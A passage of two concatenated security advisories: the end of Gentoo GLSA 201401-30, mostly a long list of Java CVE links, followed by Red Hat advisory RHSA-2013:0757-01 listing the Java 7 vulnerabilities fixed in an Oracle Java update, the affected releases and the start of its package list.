[ 34 ] CVE-2012-3159 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159 [ 35 ] CVE-2012-3174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174 [ 36 ] CVE-2012-3213 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213 [ 37 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 38 ] CVE-2012-3342 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342 [ 39 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 40 ] CVE-2012-4681 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681 [ 41 ] CVE-2012-5067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067 [ 42 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 43 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 44 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 45 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 46 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 47 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 48 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 49 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 50 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 51 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 52 ] CVE-2012-5079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079 [ 53 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 54 ] CVE-2012-5083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083 [ 55 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 56 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 57 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 58 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 59 ] CVE-2012-5088 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088 [ 60 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 61 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 62 ] CVE-2013-0351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351 [ 63 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 64 ] CVE-2013-0402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402 [ 65 ] CVE-2013-0409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409 [ 66 ] CVE-2013-0419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419 [ 67 ] CVE-2013-0422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422 [ 68 ] CVE-2013-0423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423 [ 69 ] CVE-2013-0430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430 [ 70 ] CVE-2013-0437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437 [ 71 ] CVE-2013-0438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438 [ 72 ] CVE-2013-0445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445 [ 73 ] CVE-2013-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446 [ 74 ] CVE-2013-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448 [ 75 ] CVE-2013-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449 [ 76 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 77 ] CVE-2013-1473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473 [ 78 ] CVE-2013-1479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479 [ 79 ] CVE-2013-1481 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481 [ 80 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 81 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 82 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 83 ] CVE-2013-1487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487 [ 84 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 85 ] CVE-2013-1491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491 [ 86 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 87 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 88 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 89 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 90 ] CVE-2013-1540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540 [ 91 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 92 ] CVE-2013-1558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558 [ 93 ] CVE-2013-1561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561 [ 94 ] CVE-2013-1563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563 [ 95 ] CVE-2013-1564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564 [ 96 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 97 ] CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 98 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 99 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 100 ] CVE-2013-2394 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394 [ 101 ] CVE-2013-2400 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400 [ 102 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 103 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 104 ] CVE-2013-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414 [ 105 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 106 ] CVE-2013-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416 [ 107 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 108 ] CVE-2013-2418 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418 [ 109 ] CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 110 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 111 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 112 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 113 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 114 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 115 ] CVE-2013-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425 [ 116 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 117 ] CVE-2013-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427 [ 118 ] CVE-2013-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428 [ 119 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 120 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 121 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 122 ] CVE-2013-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432 [ 123 ] CVE-2013-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433 [ 124 ] CVE-2013-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434 [ 125 ] CVE-2013-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435 [ 126 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 127 ] CVE-2013-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437 [ 128 ] CVE-2013-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438 [ 129 ] CVE-2013-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439 [ 130 ] CVE-2013-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440 [ 131 ] CVE-2013-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442 [ 132 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 133 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 134 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 135 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 136 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 137 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 138 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 139 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 140 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 141 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 142 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 143 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 144 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 145 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 146 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 147 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 148 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 149 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 150 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 151 ] CVE-2013-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462 [ 152 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 153 ] CVE-2013-2464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464 [ 154 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 155 ] CVE-2013-2466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466 [ 156 ] CVE-2013-2467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467 [ 157 ] CVE-2013-2468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468 [ 158 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 159 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 160 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 161 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 162 ] CVE-2013-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 163 ] CVE-2013-3743 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743 [ 164 ] CVE-2013-3744 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744 [ 165 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 166 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 167 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 168 ] CVE-2013-5775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775 [ 169 ] CVE-2013-5776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776 [ 170 ] CVE-2013-5777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777 [ 171 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 172 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 173 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 174 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 175 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 176 ] CVE-2013-5787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787 [ 177 ] CVE-2013-5788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788 [ 178 ] CVE-2013-5789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789 [ 179 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 180 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 181 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 182 ] CVE-2013-5801 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801 [ 183 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 184 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 185 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 186 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 187 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 188 ] CVE-2013-5809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 189 ] CVE-2013-5810 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810 [ 190 ] CVE-2013-5812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812 [ 191 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 192 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 193 ] CVE-2013-5818 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818 [ 194 ] CVE-2013-5819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819 [ 195 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 196 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 197 ] CVE-2013-5824 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824 [ 198 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 199 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 200 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 201 ] CVE-2013-5831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831 [ 202 ] CVE-2013-5832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832 [ 203 ] CVE-2013-5838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838 [ 204 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 205 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 206 ] CVE-2013-5843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843 [ 207 ] CVE-2013-5844 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844 [ 208 ] CVE-2013-5846 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846 [ 209 ] CVE-2013-5848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848 [ 210 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 211 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 212 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 213 ] CVE-2013-5852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852 [ 214 ] CVE-2013-5854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854 [ 215 ] CVE-2013-5870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870 [ 216 ] CVE-2013-5878 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878 [ 217 ] CVE-2013-5887 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887 [ 218 ] CVE-2013-5888 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888 [ 219 ] CVE-2013-5889 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889 [ 220 ] CVE-2013-5893 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893 [ 221 ] CVE-2013-5895 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895 [ 222 ] CVE-2013-5896 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896 [ 223 ] CVE-2013-5898 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898 [ 224 ] CVE-2013-5899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899 [ 225 ] CVE-2013-5902 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902 [ 226 ] CVE-2013-5904 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904 [ 227 ] CVE-2013-5905 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905 [ 228 ] CVE-2013-5906 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906 [ 229 ] CVE-2013-5907 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907 [ 230 ] CVE-2013-5910 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910 [ 231 ] CVE-2014-0368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368 [ 232 ] CVE-2014-0373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373 [ 233 ] CVE-2014-0375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375 [ 234 ] CVE-2014-0376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376 [ 235 ] CVE-2014-0382 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382 [ 236 ] CVE-2014-0385 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385 [ 237 ] CVE-2014-0387 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387 [ 238 ] CVE-2014-0403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403 [ 239 ] CVE-2014-0408 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408 [ 240 ] CVE-2014-0410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410 [ 241 ] CVE-2014-0411 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411 [ 242 ] CVE-2014-0415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415 [ 243 ] CVE-2014-0416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416 [ 244 ] CVE-2014-0417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417 [ 245 ] CVE-2014-0418 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418 [ 246 ] CVE-2014-0422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422 [ 247 ] CVE-2014-0423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423 [ 248 ] CVE-2014-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424 [ 249 ] CVE-2014-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201401-30.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: java-1.7.0-oracle security update Advisory ID: RHSA-2013:0757-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0757.html Issue date: 2013-04-18 CVE Names: CVE-2013-0401 CVE-2013-0402 CVE-2013-1488 CVE-2013-1491 CVE-2013-1518 CVE-2013-1537 CVE-2013-1540 CVE-2013-1557 CVE-2013-1558 CVE-2013-1561 CVE-2013-1563 CVE-2013-1564 CVE-2013-1569 CVE-2013-2383 CVE-2013-2384 CVE-2013-2394 CVE-2013-2414 CVE-2013-2415 CVE-2013-2416 CVE-2013-2417 CVE-2013-2418 CVE-2013-2419 CVE-2013-2420 CVE-2013-2421 CVE-2013-2422 CVE-2013-2423 CVE-2013-2424 CVE-2013-2425 CVE-2013-2426 CVE-2013-2427 CVE-2013-2428 CVE-2013-2429 CVE-2013-2430 CVE-2013-2431 CVE-2013-2432 CVE-2013-2433 CVE-2013-2434 CVE-2013-2435 CVE-2013-2436 CVE-2013-2438 CVE-2013-2439 CVE-2013-2440 ===================================================================== 1. Summary: Updated java-1.7.0-oracle packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section. (CVE-2013-0401, CVE-2013-0402, CVE-2013-1488, CVE-2013-1491, CVE-2013-1518, CVE-2013-1537, CVE-2013-1540, CVE-2013-1557, CVE-2013-1558, CVE-2013-1561, CVE-2013-1563, CVE-2013-1564, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2394, CVE-2013-2414, CVE-2013-2415, CVE-2013-2416, CVE-2013-2417, CVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2421, CVE-2013-2422, CVE-2013-2423, CVE-2013-2424, CVE-2013-2425, CVE-2013-2426, CVE-2013-2427, CVE-2013-2428, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2432, CVE-2013-2433, CVE-2013-2434, CVE-2013-2435, CVE-2013-2436, CVE-2013-2438, CVE-2013-2439, CVE-2013-2440) All users of java-1.7.0-oracle are advised to upgrade to these updated packages, which provide Oracle Java 7 Update 21 and resolve these issues. All running instances of Oracle Java must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 920245 - CVE-2013-0401 OpenJDK: sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader (CanSecWest 2013, 8009305, AWT) 920246 - CVE-2013-0402 Oracle JDK: unspecified JavaFX buffer overflow leading to JVM compromise (CanSecWest 2013, JavaFX) 920247 - CVE-2013-1488 OpenJDK: unspecified sanbox bypass (CanSecWest 2013, Libraries) 920248 - CVE-2013-1491 Oracle JDK: unspecified sanbox bypass (CanSecWest 2013, 2D) 952387 - CVE-2013-1537 OpenJDK: remote code loading enabled by default (RMI, 8001040) 952389 - CVE-2013-2415 OpenJDK: temporary files created with insecure permissions (JAX-WS, 8003542) 952398 - CVE-2013-2423 OpenJDK: incorrect setter access checks in MethodHandles (Hostspot, 8009677) 952509 - CVE-2013-2424 OpenJDK: MBeanInstantiator insufficient class access checks (JMX, 8006435) 952521 - CVE-2013-2429 OpenJDK: JPEGImageWriter state corruption (ImageIO, 8007918) 952524 - CVE-2013-2430 OpenJDK: JPEGImageReader state corruption (ImageIO, 8007667) 952550 - CVE-2013-2436 OpenJDK: Wrapper.convert insufficient type checks (Libraries, 8009049) 952638 - CVE-2013-2420 OpenJDK: image processing vulnerability (2D, 8007617) 952640 - CVE-2013-1558 OpenJDK: java.beans.ThreadGroupContext missing restrictions (Beans, 7200507) 952642 - CVE-2013-2422 OpenJDK: MethodUtil trampoline class incorrect restrictions (Libraries, 8009857) 952645 - CVE-2013-2431 OpenJDK: Hotspot intrinsic frames vulnerability (Hotspot, 8004336) 952646 - CVE-2013-1518 OpenJDK: JAXP missing security restrictions (JAXP, 6657673) 952648 - CVE-2013-1557 OpenJDK: LogStream.setDefaultStream() missing security restrictions (RMI, 8001329) 952649 - CVE-2013-2421 OpenJDK: Hotspot MethodHandle lookup error (Hotspot, 8009699) 952653 - CVE-2013-2426 OpenJDK: ConcurrentHashMap incorrectly calls defaultReadObject() method (Libraries, 8009063) 952656 - CVE-2013-2419 OpenJDK: font processing errors (2D, 8001031) 952657 - CVE-2013-2417 OpenJDK: Network InetAddress serialization information disclosure (Networking, 8000724) 952708 - CVE-2013-2383 OpenJDK: font layout and glyph table errors (2D, 8004986) 952709 - CVE-2013-2384 OpenJDK: font layout and glyph table errors (2D, 8004987) 952711 - CVE-2013-1569 OpenJDK: font layout and glyph table errors (2D, 8004994) 953135 - Oracle JDK: multiple unspecified JavaFX vulnerabilities fixed in 7u21 (JavaFX) 953166 - CVE-2013-1540 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 953172 - CVE-2013-1563 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Install) 953265 - CVE-2013-2394 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D) 953266 - CVE-2013-2416 Oracle JDK: unspecified vulnerability fixed in 7u21 (Deployment) 953267 - CVE-2013-2418 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 953268 - CVE-2013-2425 Oracle JDK: unspecified vulnerability fixed in 7u21 (Install) 953269 - CVE-2013-2432 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D) 953270 - CVE-2013-2433 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 953272 - CVE-2013-2434 Oracle JDK: unspecified vulnerability fixed in 7u21 (2D) 953273 - CVE-2013-2435 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 953274 - CVE-2013-2439 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Install) 953275 - CVE-2013-2440 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: java-1.7.0-oracle-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el5.i386.rpm 